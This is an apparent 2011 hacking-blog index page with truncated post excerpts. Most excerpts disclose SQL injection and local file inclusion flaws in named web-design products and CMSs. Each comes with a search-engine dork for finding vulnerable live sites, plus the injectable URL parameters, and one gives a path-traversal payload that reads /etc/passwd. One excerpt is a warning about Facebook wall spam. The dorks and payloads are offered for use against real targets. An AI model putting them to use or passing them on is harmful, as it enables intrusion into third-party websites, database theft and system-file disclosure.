Monday, May 23, 2011

Acuity CMS Vulnerable to Blind SQL Injection

Title : Acuity CMS Vulnerable to Blind SQL Injection Found by : p0pc0rn Dork : intext:"Powered by Acuity CMS." Web : http://www.acuitycms.com/ SQL Injection ---------------- http://www.site.com/browse.asp?page=[Blind...

Golden IT Solutions Web Design Vulnerable to SQL Injection

Title : Golden IT Solutions Web Design Vulnerable to SQL Injection Found by : p0pc0rn Dork : intext:"Developed By : Golden IT Solutions" SQL Injection ---------------- http://www.site.com/anypath.php?ID=[SQL] POC ---- http://www.site.com/memProfile.php?ID=-2800...

Saturday, May 21, 2011

New LFI Exploit found :)

New LFI Exploit found :) ------------------------- By p0pc0rn May 2011 Dork: inurl:"index.php?loc=subindex" Exploit : site.com/index.php?loc=../../../../../../../../../../../../../../../etc/passwd thanks -p0pc0...

Wednesday, May 11, 2011

New WallSpam Using Javascript in Facebook

New WallSpam Using Javascript in Facebook ------------------------------------------ If u notice a wallpost like this,NEVER EVER CLICK IT!! [spam]Not like Justin Biebier which always never say never.He's an idiot [/spam] Take...

Tuesday, May 3, 2011

Creatop Web Design Vulnerable to PosgreSQL Injection

Title : Creatop Web Design Vulnerable to PosgreSQL Injection Vendor: http://www.creatop.com.au/ Found : by p0pc0rn Dork : intext:"by Creatop" filetype:cfm PosgreSQL Injection ------------------- http://www.victim.com/index.cfm?MenuID=[Injection] Example: http://www.victim.com/index.cfm?MenuID=80...